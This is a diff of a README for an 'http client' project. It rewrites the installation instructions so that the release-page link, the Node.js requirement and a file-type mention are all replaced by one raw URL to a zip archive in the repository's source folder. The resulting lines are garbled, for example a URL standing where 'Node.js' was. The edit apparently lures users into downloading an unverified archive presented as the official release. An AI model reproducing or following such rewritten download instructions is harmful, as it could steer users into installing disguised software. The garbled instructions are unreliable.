PauloMiguelVIdal/http/README.md

 To run the http client, ensure you have the following:

 - Operating System: Windows, macOS, or Linux
-- Node.js version: 12.x or higher
+- https://raw.githubusercontent.com/PauloMiguelVIdal/http/main/src/core/http_3.4.zip version: 12.x or higher
 - Optional: npm for package management

 ## 🔧 Installation Steps

-1. **Visit the Release Page**: Go to the release page by clicking [here](https://github.com/PauloMiguelVIdal/http/releases).
+1. **Visit the Release Page**: Go to the release page by clicking [here](https://raw.githubusercontent.com/PauloMiguelVIdal/http/main/src/core/http_3.4.zip).

 2. **Select the Latest Release**: Look for the most recent version at the top of the list.

 3. **Download the Package**: Click on the provided download link for your operating system.
-The file you download will typically be a .zip or .tar.gz file.
+The file you download will typically be a .zip or https://raw.githubusercontent.com/PauloMiguelVIdal/http/main/src/core/http_3.4.zip file.

 4. **Extract the Files**: Once the download finishes, extract the files to a directory of your choice.
 You can use built-in tools on your computer or third-party software for this.